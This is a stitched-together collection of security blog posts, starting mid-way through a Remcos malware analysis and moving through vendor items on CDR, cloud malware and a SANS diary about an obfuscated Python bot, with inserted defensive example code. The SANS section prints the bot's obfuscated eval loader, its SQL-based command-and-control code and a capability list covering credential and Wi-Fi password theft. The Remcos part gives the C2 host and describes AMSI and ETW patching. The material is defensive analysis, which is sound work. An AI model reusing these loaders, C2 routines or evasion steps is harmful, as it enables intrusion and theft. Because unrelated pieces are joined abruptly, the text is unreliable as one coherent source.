Now we can safely change the function name to UnhookModule.
This is the last major function of this executable:
Figure 16: Patching functions in memory with code that returns an error code.
This function takes a few arguments: a DLL name, a function name, and a byte sequence.
It is responsible for patching functions in memory with code that returns an error code: 0x80070057 “The parameter is incorrect”.
To summarize, this is the first .NET Main Functionality:
Unhooking kernel32.dll
Unhooking ntdll.dll
Patching the amsi.dll AmsiScanBuffer function to return “The parameter is incorrect” code (0x80070057)
Patching the ntdll.dll EtwEventWrite function to return “The parameter is incorrect” code (0x80070057)
The second .NET module is also heavily obfuscated, but its code is much smaller. In addition, now that we understand how the obfuscation works, it is much easier to understand its content.
Figure 17: Reversed and deobfuscated second .NET module.
To summarize, this is the second .NET Main Functionality:
Check if there is a debugger.
Use PowerShell to wait for the process to end and then delete the main module file.
Load two additional files from the resources:
Remcos malware
LoadPE .NET executable
At the end of the Main function, the final payload, Remcos, is assigned to the “array” variable and then is passed as an argument to another invoked .NET executable, the “LoadPE” exe, which is responsible for getting an executable as an argument and loading it using reflective loading.
As we mentioned earlier in this report, reflective loading is used to dynamically load a library or executable directly into memory without relying on the standard operating system mechanisms for loading files from the disk.
In malware, reflective loading is often employed as a stealthy way to execute malicious code without writing any files to the disk. This makes it harder for traditional security tools to detect the presence of the malware as there are no files that can be scanned or monitored. Reflective loading also makes it harder to identify and analyze the malicious code.
The third LoadPE .NET executable is not obfuscated at all, which means we can easily reverse-engineer and understand what it’s used for.
These are its functions:
Figure 18: LoadPE .NET functions.
The final payload, the Remcos malware, stores its encrypted configuration file, called “SETTING”, in the resources.
We can easily see the configuration in memory:
Figure 19: Remcos configuration in memory.
Summary of the Remcos configuration:
Host:Port:Password: “192[.]161[.]184[.]21:24050:1”
Assigned name: “Vps”
Copy file: “remcos.exe”
Startup value: “Remcos”
Mutex: “Rmcvps-JUECXT”
Keylog file: “vpslogs.dat”
Screenshot file: “Screenshots”
Audio folder: “MicRecords”
Copy folder: “Remcos”
Keylog folder: “vp”
Keylog file max size: “100000”
We wanted to see if our assumptions were correct, so we entered the word “password” and also “xxxx” and “123123”, then checked the keylogging file. As you can see, we were right.
Figure 20: Keylogging in action.
Conclusion
Our analysis offers a glimpse into the intricate world of evasion techniques and deobfuscation procedures employed by attackers. By deciphering the hidden functionalities of the malicious BAT and .NET modules, we were able to shed light on the attack flow’s complexity. Understanding these technical intricacies is essential for enhancing cybersecurity defenses and devising effective countermeasures to protect against such advanced phishing campaigns.
Check Point customers remain protected from the threats described in this research.
Check Point’s Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems and has developed and deployed a signature to detect and protect customers against threats described in this research.
Threat Emulation:
Technique.Win.Unhooking.B
Technique.Win.WrongFileExt.A
Technique.Win.UnhookingNtdll.A
IOCs
C2 IOC: 192[.]161[.]184[.]21
BAT IOC’s:
dbc8cd0d565c9fa45a0f0ce030f609cfbc8dcc49747c2466b4f4b5024f321a07
fca597824d2483f83903cd20c6e72582f0ce3457a8964c6d9bc7496d091a54d1
5376e86860ed52f3dcb5d3ded457e6695d41cad361e530512a4bc8f394f5447f
dcd19c1b66e261009a745aeb0ed753cc920fca12880d51536bd967409c612466
686e60dd409183a014171bf484668e4bb3b9366a8fd0856a6dc2a76a341589db
879b86cdf85c67b99c2f45afbaba8e4967a360650f0e747e23c98467bf825f8e
f0dd1ab2eacb11691b9d6935421026676f2e39332894e614067681004d83ca1c
2133425e1f87ea4729f40f17beeac8e25183b062a48926e20deef57a4d1819be
62985803796b5b5f2a9bffb777b46066e7167813dc53d3449ec5ece2add690e3
bca1a7ef84a73e10e326f39fe543fd34e50bba41b422095dae1582d3e90718a3
RAR IOC’s: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
The post Guarding Against the Unseen: Investigating a Stealthy Remcos Malware Attack on Colombian Firms appeared first on Check Point Research.
What matters most to security leaders in 2023? Why is CISA urging AI vendors to apply secure by design practices to software products? What are the top 3 malware variants in Q2 2023?
We’ve got you covered in this week’s edition of the Tenable Cyber Watch, our weekly video news digest highlighting three cybersecurity topics that matter right now.
Here’s what’s happening in cyber. Today, we’re talking:
All about what security leaders say they’re choosing to prioritize
Why CISA is urging AI vendors to apply secure by design practices to software products
The top 3 malware variants of Q2 2023
Every Monday at 9am ET, the Tenable Cyber Watch brings you cybersecurity news you can use. Watch this week’s episode below and subscribe to our playlist on YouTube.
Check Point Research reported on a new ChromeLoader campaign named “Shampoo” which targets Chrome browser users with malware-loaded fake ads. Meanwhile, the communications sector jumped up the list to the second most impacted industry over healthcare.
Our latest Global Threat Index for August 2023 saw researchers report on a new variant of the ChromeLoader malware, which has been targeting Chrome browser users with fake ads loaded with malicious extensions. Meanwhile, the communications sector ranked as the second most impacted industry globally, knocking healthcare off the list for the first time this year. ChromeLoader is a persistent Google Chrome browser […]
The post August 2023’s Most Wanted Malware: New ChromeLoader Campaign Spreads Malicious Browser Extensions while QBot is Shut Down by FBI appeared first on Check Point Blog.
The content of this post is solely the responsibility of the author. AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.
Here’s how organizations can eliminate content-based malware in ICS/OT supply chains.
As the Industrial Internet of Things (IIoT) landscape expands, ICS and OT networks are more connected than ever to various enterprise systems and cloud services. This new level of connectivity, while offering benefits, also paves the way for targeted and supply chain attacks, making them easier to carry out and broadening their potential effects.
A prominent example of supply chain vulnerability is the 2020 SolarWinds Orion breach. In this sophisticated attack:
Two distinct types of malware, “Sunburst” and “Supernova,” were secretly placed into an authorized software update.
Over 17,000 organizations downloaded the update, and the malware managed to evade various security measures.
Once activated, the malware connected to an Internet-based command and control (C2) server using what appeared to be a harmless HTTPS connection.
The C2 traffic was cleverly hidden using steganography, making detection even more challenging.
The threat actors then remotely controlled the malware through their C2, affecting up to 200 organizations.
While this incident led to widespread IT infiltration, it did not directly affect OT systems.
In contrast, other attacks have had direct impacts on OT. In 2014, a malware known as Havex was hidden in IT product downloads and used to breach IT/OT firewalls, gathering intelligence from OT networks. This demonstrated how a compromised IT product in the supply chain could lead to OT consequences.
Similarly, in 2017, the NotPetya malware was concealed in a software update for a widely-used tax program in Ukraine. Though primarily affecting IT networks, the malware caused shutdowns in industrial operations, illustrating how a corrupted element in the supply chain can have far-reaching effects on both IT and OT systems.
These real-world incidents emphasize the multifaceted nature of cybersecurity risks within interconnected ICS/OT systems. They serve as a prelude to a deeper exploration of specific challenges and vulnerabilities, including:
Malware attacks on ICS/OT: Specific targeting of components can disrupt operations and cause physical damage.
Third-party vulnerabilities: Integration of third-party systems within the supply chain can create exploitable weak points.
Data integrity issues: Unauthorized data manipulation within ICS/OT systems can lead to faulty decision-making.
Access control challenges: Proper identity and access management within complex environments are crucial.
Compliance with best practices: Adherence to guidelines such as NIST’s best practices is essential for resilience.
Rising threats in manufacturing: Unique challenges include intellectual property theft and process disruptions.
Traditional defenses are proving inadequate, and a multifaceted strategy, including technologies like Content Disarm and Reconstruction (CDR), is required to safeguard these vital systems.
Supply chain defense: The power of content disarm and reconstruction
Content Disarm and Reconstruction (CDR) is a cutting-edge technology. It operates on a simple, yet powerful premise based on the Zero Trust principle: all files could be malicious.
What does CDR do?
In the complex cybersecurity landscape, CDR stands as a unique solution, transforming the way we approach file safety.
Sanitizes and rebuilds files: By treating every file as potentially harmful, CDR ensures they are safe for use while maintaining full functionality.
Removes harmful elements: This process effectively removes any harmful elements, making it a robust defense against known and unknown threats, including zero-day attacks.
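The premise above, rebuild the file from parts known to be safe instead of searching it for known-bad content, can be shown on an Office container. The Python below is an added example, not the post author's or any CDR vendor's code, and not how a commercial CDR engine is built: it rebuilds a .docx from an allow-list of package parts, discards everything else (a VBA project, an embedded OLE object) without inspecting it, and prunes the relationship and content-type entries that pointed at the dropped parts so the result still opens. The allow-list is an assumption chosen for the example, and the macro-enabled sample document is constructed inside the block.

```python
import io
import posixpath
import re
import zipfile

# Allow-list of package parts an ordinary Word document needs (an assumption
# chosen for this example). Anything else in the container, such as a VBA
# project, embedded OLE objects, ActiveX controls or custom XML, is discarded
# without being inspected: the file is rebuilt, not scanned for known-bad.
ALLOWED_PARTS = re.compile(
    r"^(?:\[Content_Types\]\.xml|_rels/\.rels|docProps/(?:core|app)\.xml"
    r"|word/(?:document|styles|settings|fontTable|numbering)\.xml"
    r"|word/_rels/document\.xml\.rels|word/media/[^/]+\.(?:png|jpe?g))$"
)
REL_RE = re.compile(r"<Relationship\b[^>]*?/>")
OVERRIDE_RE = re.compile(r"<Override\b[^>]*?/>")


def _attr(tag, name):
    m = re.search(r'\b%s="([^"]*)"' % name, tag)
    return m.group(1) if m else ""


def _prune_rels(xml, rels_path, kept):
    """Drop <Relationship> entries whose target part was not kept. Targets in
    word/_rels/document.xml.rels are relative to word/, those in _rels/.rels
    to the package root. External targets (hyperlinks) are left alone."""
    base = posixpath.dirname(posixpath.dirname(rels_path))

    def keep(m):
        tag = m.group(0)
        if _attr(tag, "TargetMode") == "External":
            return tag
        target = posixpath.normpath(posixpath.join(base, _attr(tag, "Target")))
        return tag if target in kept else ""

    return REL_RE.sub(keep, xml.decode()).encode()


def _prune_content_types(xml, kept):
    """Drop <Override> entries for parts that were not kept."""
    def keep(m):
        part = _attr(m.group(0), "PartName").lstrip("/")
        return m.group(0) if part in kept else ""
    return OVERRIDE_RE.sub(keep, xml.decode()).encode()


def sanitize_docx(data):
    """Rebuild a .docx from its allow-listed parts. Returns (clean_bytes, dropped_parts)."""
    src = zipfile.ZipFile(io.BytesIO(data))
    names = [info.filename for info in src.infolist()]
    kept = {n for n in names if ALLOWED_PARTS.match(n)}
    dropped = [n for n in names if n not in kept]
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in names:
            if name not in kept:
                continue
            body = src.read(name)
            if name.endswith(".rels"):
                body = _prune_rels(body, name, kept)
            elif name == "[Content_Types].xml":
                body = _prune_content_types(body, kept)
            dst.writestr(name, body)
    return out.getvalue(), dropped


def list_parts(data):
    return zipfile.ZipFile(io.BytesIO(data)).namelist()


def read_part(data, name):
    return zipfile.ZipFile(io.BytesIO(data)).read(name).decode()


def build_sample_document():
    """Constructed macro-enabled document: a minimal Word package plus a VBA
    project and an embedded OLE blob (both placeholders, not real payloads)."""
    parts = {
        "[Content_Types].xml":
            '<Types><Default Extension="xml" ContentType="application/xml"/>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>'
            '</Types>',
        "_rels/.rels":
            '<Relationships><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>',
        "word/document.xml":
            '<w:document><w:body><w:p><w:r><w:t>Invoice</w:t></w:r></w:p></w:body></w:document>',
        "word/_rels/document.xml.rels":
            '<Relationships>'
            '<Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>'
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.invalid/" TargetMode="External"/>'
            '</Relationships>',
        "word/vbaProject.bin": b"placeholder bytes standing in for a VBA project",
        "word/embeddings/oleObject1.bin": b"placeholder bytes standing in for an OLE object",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    clean, dropped = sanitize_docx(build_sample_document())
    print("dropped:", dropped)
    print("kept:", list_parts(clean))
```

This example works at the container level only; a production engine also rebuilds the XML parts themselves (fields, external references, embedded fonts) from a parsed representation, which is where the "full functionality" claim above is earned or lost.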
How does it work?
CDR’s effectiveness lies in its methodical approach to file handling, ensuring that no stone is left unturned in the pursuit of security.
Content firewall: CDR acts as a barrier, with files destined for OT systems relayed to external sanitization engines, creating a malware-free environment.
High availability: Whether on the cloud or on-premises in the DMZ (demilitarized zone), the external location ensures consistent sanitization across various locations.
Why choose CDR?
With cyber threats becoming more sophisticated, CDR offers a fresh perspective, focusing on prevention rather than mere detection.
Independence from detection: Unlike traditional methods, CDR can neutralize both known and unknown malware, giving it a significant advantage.
Essential for security: Its unique approach makes CDR an indispensable layer in critical network security.
CDR in action:
Beyond theory, CDR’s real-world applications demonstrate its ability to adapt and respond to various threat scenarios.
Extreme processes: CDR applies deconstruction and reconstruction to incoming files, disrupting any embedded malware.
Virtual content perimeter: Positioned outside the network, in the DMZ, it blocks malicious code entry through email and file exchange.
Preventative measures: By foiling the initial access phase, CDR has been shown to deliver up to 100% prevention rates for various malware.
Integration possibilities:
CDR technology can be seamlessly integrated into various network security modules.
Secure email gateways: Enhances email security by integrating with existing systems, providing an additional layer of protection.
USB import stations: Offers controlled access to USB devices, ensuring that only sanitized content is allowed.
Web-based secure managed file transfer systems: Enables comprehensive coverage of file transfers, ensuring sanitized content at every step.
Firmware and software updates: Aims to cover all content gateways, securing a ‘sterile area’ behind these modules, including essential updates.
NIST’s guidelines that call for the adoption of CDR
The National Institute of Standards and Technology (NIST) has outlined specific guidelines that highlight the importance of CDR. In the NIST SP 800-82 Revision 3 document, the emphasis on CDR’s role is evident:
1. Physical access control:
Portable devices security: Under the section ‘6.2.1.2 Physical Access Controls (PR.AC-2),’ the guidelines stress that organizations should apply a verification process to portable devices like laptops and USB storage. This includes scanning for malicious code before connecting to OT devices or networks, where CDR can play a vital role in ensuring safety.
2. Defense-in-depth strategy:
Multi-layered protection: Under section 5.1.2, the document defines defense-in-depth as a multifaceted strategy. It states: ‘a multifaceted strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and dimensions of the organization.’ This approach is considered best practice in the cybersecurity field.
Widespread adoption: The quote continues, emphasizing that ‘Many cybersecurity architectures incorporate the principles of defense-in-depth, and the strategy has been integrated into numerous standards and regulatory frameworks.’ This highlights the broad acceptance and integration of this strategy in various cybersecurity measures.
OT environments: This strategy is particularly useful in OT environments, including ICS, SCADA, IoT, IIoT, and hybrid environments. It focuses on critical functions and offers flexible defensive mechanisms.
CDR’s role in defense: CDR contributes to this defense-in-depth approach, especially in handling content with browser isolation solutions. Its role in enhancing security across different layers of the organization makes it a valuable asset in the cybersecurity landscape.
Mitigating the risks
The SolarWinds breach was a frightening sign of what has already begun, and it might just be a small part of what’s happening now. With criminal groups capitalizing on the increasing cloud connectivity at ICS/OT sites, attacks on hundreds or even thousands of organizations simultaneously are actual risks we face today.
But amid these challenges, there’s a solution: CDR. This cutting-edge technology offers a robust defense against the known and unknown, providing a shield against malicious forces that seek to exploit our interconnected world. In the ongoing battle against malware, CDR stands as a vigilant sentinel, ever ready to protect.
Qualys Blog Series – 2023 TotalCloud Security Insights by the Threat Research Unit
The 2023 TotalCloud Security Insights report from the Qualys Threat Research Unit (TRU) provides research insights, best practices, and detailed recommendations organized by five separate Risk Facts. The insights will enable organizations using cloud technologies to better understand these risks and how they can be better prepared to face those challenges in today’s threat landscape.
Read the previous blog in this series: External-Facing Vulnerabilities Cloud Security Research Risk Fact
Threats Known to Exploit High-Risk Assets
The data show that crypto mining and malware are the two most significant threats to cloud assets; both are designed to provide a foothold in your environment or facilitate lateral movement.
The critical damage caused by crypto mining is based on the wasted cost of compute cycles. Miners seek to use your cloud to create crypto coins and do not plan to deposit the coins in your account! An unmitigated crypto mining attack could cost your organization millions due to energy and cloud resource allocation fees. It also displaces your organization’s use of the resources it is paying for.
Not accounting for generic coin mining software such as XMRig, the top three malware categories in cloud infrastructures observed were AndroxGh0st/Legion RCE, Denonia, and SCARLETEEL. The data show the bulk of malware that will impact an insecure cloud asset is some variant of the crypto miner, many of which are generic and a few of which have received names — like Denonia.
Denonia
Denonia malware is an exciting use case as it is the first malware strain to specifically target AWS Lambda. There are no controls currently in the CIS Hardening Benchmark for AWS that cover Lambda specifically, outside of enabling IAM Access Analyzer, which examines permissions provided to Lambda functions.
Looking at controls outside of CIS benchmarks, Lambda reflects the overall hardening stance for AWS, and the 15 monitored controls are passing at 56.8%.
Below, we look at seven of those controls that are failing more than 50% of the time.
Fig.1 AWS Lambda Configuration Fail Rates
Getting a Foothold — AndroxGh0st/Legion RCE, SCARLETEEL
In addition to crypto miners, the data show the use of AndroxGh0st and SCARLETEEL. AndroxGh0st works by targeting .env files to gain access to sensitive information such as high-permission credentials, allowing the attacker to move laterally through your organization.
SCARLETEEL specifically targets high-risk external-facing cloud assets to gather credentials and subsequently launch a credential-stuffing attack for lateral movement and exploitation of your cloud environment. Some attacks could eventually affect your on-premises assets.
SCARLETEEL also specifically targets Lambda functions to achieve its purpose.
AndroxGh0st/Legion RCE
The AndroxGh0st malware is written in Python and usually targets Simple Mail Transfer Protocol (SMTP) to enable spamming. AndroxGh0st specifically targets cloud environments — in particular, AWS secrets — and exploits vulnerabilities in web applications running in the cloud to maintain a foothold.
Just one vulnerability, CVE-2017-9841, in PHPUnit has been associated explicitly with AndroxGh0st. However, after getting a foothold, the malware will programmatically attempt to maintain persistence in AWS by creating accounts and enabling permissions.
Fig.2 Controls Abused by AndroxGh0st
Leveraging Deep Learning AI to Detect Advanced Malware
Exploitation is where the adversaries’ public stories begin. When risk-reward is excellent enough, exploitation is a consequence. For defenders, the challenge is discovering and eradicating stealthy malware commonly found in Linux containers, which can evade detection for months. Legacy signature-based techniques simply cannot create and deploy signatures fast enough to prevent malware from infiltrating enterprise clouds.
A new approach is required using deep learning AI technology to quickly discover advanced malware in containers and complex network traffic flows. Deep learning is vital for enabling the sub-second detection of advanced zero-day malware, which refers to previously unknown and unseen malicious software that exploits vulnerabilities in cloud systems. Without this capability, high-risk cloud assets are ripe for exploitation.
Critical Insights from Risk Fact 4
Findings by the Threat Research Unit reveal a substantial risk of advanced malware in enterprise clouds. The most significant threats to cloud assets are crypto mining and malware, which provide a foothold in your environment or facilitate lateral movement. Detecting these threats quickly requires faster capabilities than legacy signature-based tools. A modern approach using deep learning AI can provide sub-second detection of advanced malware. Without this capability, cloud security has a substantial elevation of risk.
To learn more about the five cloud security Risk Facts and detailed recommendations, download your copy of Qualys 2023 TotalCloud Security Insights.
Read the next blog in this series: Keeping the pace of remediation at a cloud scale requires automation.
Get the full Qualys 2023 TotalCloud Security Insights and learn about all five Cloud Risk Facts now.
For modern malware, having access to its C2 (Command and control) is a crucial point. There are many ways to connect to a C2 server using tons of protocols, but today, HTTP remains very common because HTTP is allowed on most networks…
I found a malicious Python script that is pretty well obfuscated. The applied technique reduces its VT score to 6/60! It’s based on a mix of Base64- and Hex-encoded data.
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
Note that '\x72\x6f\x74\x31\x33' is "ROT13"!
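The layers in that snippet (hex-escaped literals fed to eval, rot13 on some chunks, Base64 on the joined result) can be peeled off statically without ever executing the script. The Python below is an added example, not the diary author's tooling: it walks the first stage with the ast module, evaluates only a tiny expression subset (constants, names already seen, string concatenation, eval of a string literal, codecs.decode, base64.b64decode), and returns the decoded second-stage source instead of running it. The first-stage script it operates on is constructed in the block in the same shape as the sample, with a harmless print as the second stage.

```python
import ast
import base64
import codecs


def _qualname(func):
    """'eval' for a bare name, 'codecs.decode' for an attribute chain."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return _qualname(func.value) + "." + func.attr
    return ""


def _resolve(node, env):
    """Evaluate a tiny expression subset without exec/eval: constants, names
    already bound in env, string concatenation, and the three calls the
    sample relies on. eval('<literal>') is resolved by parsing the literal
    as source and recursing, so the layers peel off statically."""
    if isinstance(node, ast.Constant):
        return node.value
    if isinstance(node, ast.Name):
        return env[node.id]
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        return _resolve(node.left, env) + _resolve(node.right, env)
    if isinstance(node, ast.Call):
        fn = _qualname(node.func)
        args = [_resolve(a, env) for a in node.args]
        if fn == "eval" and len(args) == 1 and isinstance(args[0], str):
            return resolve(args[0], env)
        if fn == "codecs.decode":
            return codecs.decode(*args)
        if fn == "base64.b64decode":
            return base64.b64decode(*args)
    raise ValueError("unsupported construct: " + ast.dump(node))


def resolve(expr_src, env):
    """Resolve a single expression given the names bound so far."""
    return _resolve(ast.parse(expr_src, mode="eval").body, env)


def unwrap_stage(src, env=None):
    """Walk a first-stage script statement by statement. Assignments are
    resolved into env; the final eval(compile(PAYLOAD, ...)) is not run,
    its PAYLOAD argument is resolved and returned as the next-stage source."""
    env = dict(env or {})
    for stmt in ast.parse(src).body:
        if isinstance(stmt, ast.Assign) and len(stmt.targets) == 1 \
                and isinstance(stmt.targets[0], ast.Name):
            env[stmt.targets[0].id] = _resolve(stmt.value, env)
        elif isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call) \
                and _qualname(stmt.value.func) == "eval":
            inner = stmt.value.args[0]
            if isinstance(inner, ast.Call) and _qualname(inner.func) == "compile":
                payload = _resolve(inner.args[0], env)
                return payload.decode() if isinstance(payload, bytes) else payload, env
    return None, env


def _hexlit(s):
    """Render s as a '\\xNN\\xNN...' string literal, as the sample does."""
    return "'" + "".join("\\x%02x" % ord(c) for c in s) + "'"


# Constructed stand-in for the first stage: same shape as the sample (four
# chunks, two of them rot13'd, joined through eval of hex-escaped literals),
# but the second stage is a harmless print, not the real script's payload.
STAGE2 = "print('constructed second stage; nothing harmful here')"
_b64 = base64.b64encode(STAGE2.encode()).decode()
_q = len(_b64) // 4
_chunks = [_b64[:_q], _b64[_q:2 * _q], _b64[2 * _q:3 * _q], _b64[3 * _q:]]
SAMPLE_STAGE1 = "\n".join([
    "import base64, codecs",
    "magic = %r" % _chunks[0],
    "love = %r" % codecs.encode(_chunks[1], "rot13"),
    "god = %r" % _chunks[2],
    "destiny = %r" % codecs.encode(_chunks[3], "rot13"),
    "joy = " + _hexlit("rot13"),
    "trust = eval(%s) + eval(%s) + eval(%s) + eval(%s)" % (
        _hexlit("magic"), _hexlit("codecs.decode(love, joy)"),
        _hexlit("god"), _hexlit("codecs.decode(destiny, joy)")),
    "eval(compile(base64.b64decode(eval(%s)),'<string>','exec'))" % _hexlit("trust"),
])

if __name__ == "__main__":
    stage2, env = unwrap_stage(SAMPLE_STAGE1)
    print("recovered stage 2:", stage2)
```

Because the resolver raises on anything outside its subset, an unexpected construct stops the walk rather than silently falling back to exec, which is the property you want when the input is a sample of unknown behaviour.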
If the payload is obfuscated, the following lines attracted my attention at the very beginning of the first-stage script:
host = "akfksfjriwjerijweijriewjesjresjfsdfmsdkfjksdjfksdjfsdf"
user = "https://discord.gg/ZHnJfPS6"
database = "https://discord.gg/ZHnJfPS6"
password = "https://discord.gg/ZHnJfPS6"
port = 5432
The port 5432 is used to connect to PostgreSQL database servers! Unfortunately, it was not possible to get the database server connection details. Probably, the script was submitted to VT as a test. The presence of this line also reveals that SQL queries will be performed:
import psycopg2
The decoded payload contains a lot of SQL queries and reveals C2 communications.
The computer registration:
self.createCur()
self.devid = str(randint(0, 999999))
self.cur.execute("INSERT INTO zday (devid, ip, hostname) VALUES ('" + self.devid + "', '" + ip + "', '" + host + "')")
self.conn.commit()
self.cur.close()
Reception of commands to execute:
self.createCur()
self.cur.execute("SELECT command FROM zday WHERE devid = '" + self.devid + "'")
res = self.cur.fetchone()
command = res[0]
if devmode: print("command: " + str(command))
if command is not None:
    self.cur.close()
    self.parseCommand(command)
else:
    self.cur.close()
Upload a file:
self.createCur()
self.cur.execute(f"UPDATE zday SET file = {psycopg2.Binary(self.get_bytes_from_file(path))} WHERE devid = '" + self.devid + "'")
self.conn.commit()
self.cur.close()
Thanks to the parseCommand() function analysis, we can build a list of the bot capabilities:
getPublicIp
getWifiPasses
dir
addToWinStartup
SVCSploit
getCDIR
addLocalToAdmin
screenshot.get
getVersion
sysInfo
disconnect
killKeylogger
fireFig
userPriv
storedCred
netCon
dnsList
netConf
arpCache
localAdmin
samBak
schedTasks
regup
webcamPic
hideMe
runas
timedcommand
moveScript
selfUpdate
msgBox
changeWallpaper
getfile
gotfile
gotfilekey
I searched for similar scripts with valid credentials, but nothing was found yet. If you spotted the same kind of script, please share!
This is another good proof that egress filtering must be in place to prevent hosts from communicating through exotic ports! (5432 in this case). Stay safe!
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Multiple New Campaigns in 2023 Demonstrate The Malware Family Has Been Redeveloped to Remain a Popular And Prominent Threat
EclecticIQ analysts observe the malware family targeting financial information to be used for immediate gain as well as reconnaissance functions to perform initial information gathering and establish persistence. RedLine stealer is almost always accompanied by other malware; either preceded by a loader to install it or succeeded by further malware. In the last major iteration of RedLine stealer in 2022, variants were almost always configured to rely on exploit kits for infection. At some point in 2022 infections saw a relative break in traffic as developers retooled, but in 2023 the malware has re-emerged as a prominent threat and is now reliant on other malware to act as the loader. [1] Most recently, Trend Micro identified a campaign that leveraged trojanized large-language model software to trick users into installing RedLine. [2]
Campaign variants emerge in VirusTotal starting the last week of April. [3] Samples very likely undergo initial testing in late April. This is supported by evidence from command and control infrastructure, discussed below. A small initial cluster of RedLine peaks approximately mid-July before tapering off significantly by the beginning of August. Sample volume then resumes in higher volume the second week of August.
Introduction At DomainTools, we take great pride in helping organizations detect and predict emerging threats, including malware infections. When not working, many DomainTools employees and their families also enjoy gaming. When these two worlds collide with the data breach from Discord.io, a popular tool for growing Discord community groups, we take notice. It’s worth starting […]
When you handle a lot of malicious files, you must have a process and tools in place to speed up the analysis. It’s impossible to investigate all files, and a key point is to find interesting files that deserve more attention. In my malware analysis lab, I use a repository called my “Malware Zoo” where I put all the files. This repository is shared across different hosts (my computer, REMnux and Windows virtual machines). This helps me to keep all the “dangerous files” in a central location and avoid spreading dangerous stuff everywhere. When you analyze a malware, you’ll quickly generate more files: You extract shellcodes, configurations, DLLs, more executables, and those files should also be analyzed. To perform a quick triage with basic operations, I rely on the Inotify[1] suite.
This suite of tools allows you to track changes on a file system. Via command line tools, you can get events when a file has been created, deleted, or opened. I’m using a simple script on my malware zoo that receives notifications every time a file is created (which means I dropped a new sample). Then the script performs simple actions. By default:
It generates the SHA256 of the file
It performs a lookup on VT
Of course, the script can perform deeper actions depending on the file type. Extract strings from PE files, disassemble a shell code, the sky is the limit!
Here is my simple script:
#!/bin/bash
#
# inotify_triage.sh - Automatic triage script based on inotifywait
#
# Path to monitor
MALWAREZOO="/data/my_malware_zoo"
# Exclude the side files written by this script (and editor swap files),
# otherwise every triage result would itself trigger a new create event.
inotifywait -m -e create -r --exclude "\.(tmp|sha256sum|vtresults|sw\w+)$" "$MALWAREZOO" | while read path action file
do
    logger "File $file created in $path"
    # Generate SHA256
    SHA256=$(shasum -a 256 "$path$file" | cut -d " " -f 1)
    echo "$SHA256" >"$path$file.sha256sum"
    # Search file on VT
    vt -s "$SHA256" >"$path$file.vtresults"
    # PE File
    if file "$path$file" | grep -q PE32; then
        # Perform PE files triage (placeholder: bash does not allow an empty block)
        :
    fi
    # Upload to MWDB
    mwdb.py -t "autotriage" "$path$file"
done
Once launched, the script will get notified when a file is created. Very important: you must exclude all files that will be created by the script! This script is running on my REMnux via systemd (to be launched at boot time and kept running in the background).
Warning: the script above is very simple and should perform triage very quickly. If you need to launch time-consuming actions, it’s recommended to launch them in the background!
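The empty PE branch in the script above is where file-type-specific work goes. The Python below is an added example of that step, not the diary author's script and in a different language from it: it reuses the same exclusion pattern so triage output is never triaged again, hashes the sample, recognises a PE by following the DOS header's e_lfanew field to the PE signature, and pulls printable strings out of it. The sample file is a constructed PE-shaped blob, not a real executable; triage_path is the entry point a watcher would call with the dropped file's path.

```python
import hashlib
import os
import re
import struct

# Same side-file and editor swap-file exclusions as the inotifywait script:
# the .sha256sum and .vtresults files it writes must not re-trigger triage.
SKIP_RE = re.compile(r"\.(tmp|sha256sum|vtresults|sw\w+)$")


def should_skip(filename):
    return bool(SKIP_RE.search(filename))


def is_pe(data):
    """True if data has a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extract_strings(data, min_len=6):
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage_bytes(filename, data):
    """Return the triage record the shell script would write as side files,
    or None when the file is one the watcher should ignore."""
    if should_skip(filename):
        return None
    record = {"file": filename, "sha256": hashlib.sha256(data).hexdigest(), "pe": is_pe(data)}
    if record["pe"]:
        record["strings"] = extract_strings(data)
    return record


def triage_path(path):
    with open(path, "rb") as fh:
        return triage_bytes(os.path.basename(path), fh.read())


def make_fake_pe():
    """Constructed minimal PE-shaped blob: MZ header, e_lfanew = 0x40, the
    'PE\\0\\0' signature, then two strings a triage step would report.
    Not a real executable."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20 + b"kernel32.dll\x00VirtualProtect\x00"


if __name__ == "__main__":
    print(triage_bytes("sample.bin", make_fake_pe()))
    print(triage_bytes("sample.bin.sha256sum", b"ignored"))
```

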